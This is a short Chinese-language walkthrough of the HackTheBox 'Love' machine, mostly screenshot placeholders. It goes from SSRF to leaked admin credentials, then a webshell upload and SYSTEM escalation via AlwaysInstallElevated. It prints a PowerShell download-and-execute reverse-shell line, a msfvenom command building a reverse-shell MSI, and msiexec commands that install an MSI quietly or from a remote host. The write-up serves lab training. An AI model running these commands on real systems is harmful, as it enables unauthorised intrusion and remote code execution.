Love - HackTheBox
Td

image

nmap扫描

image

image

image

访问80

image

登录框,猜不出密码,在看看443端口

image

image

这给出了一个域名,添加hosts文件

image

image

这发现一个疑似ssrf的地方

image

看看他的文件

image

image

这还开了个5000端口

image

直接访问403错误,尝试让其自己请求一下

image

得到了一个管理员的账户密码

去80登录

image

应该不是这里,扫一下目录

image

访问admin目录

image

image

在这里可以新建名单,有上传点

image

传一个webshell进去

image

反弹shell

powershell -c "iex (new-object system.net.webclient).downloadstring('http://10.10.14.17/test.ps1')"

image

提权

image

image

win10专业版 64位系统,补丁打了一大堆

image

这边也不行,用工具检测一下

image

终于碰到了,注册表!

这玩意,只要是以.msi结尾的文件,在运行时,都会以system权限去运行

先用msf生成一个msi后门

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.17 LPORT=7777 -f msi -o sh.msi

image

image

很直接

image

1
2
3
4
#隐藏界面安装
msiexec /quiet /qn /i xxx.msi
#远程加载安装
msiexec /q /i http://192.168.101.146/test.msi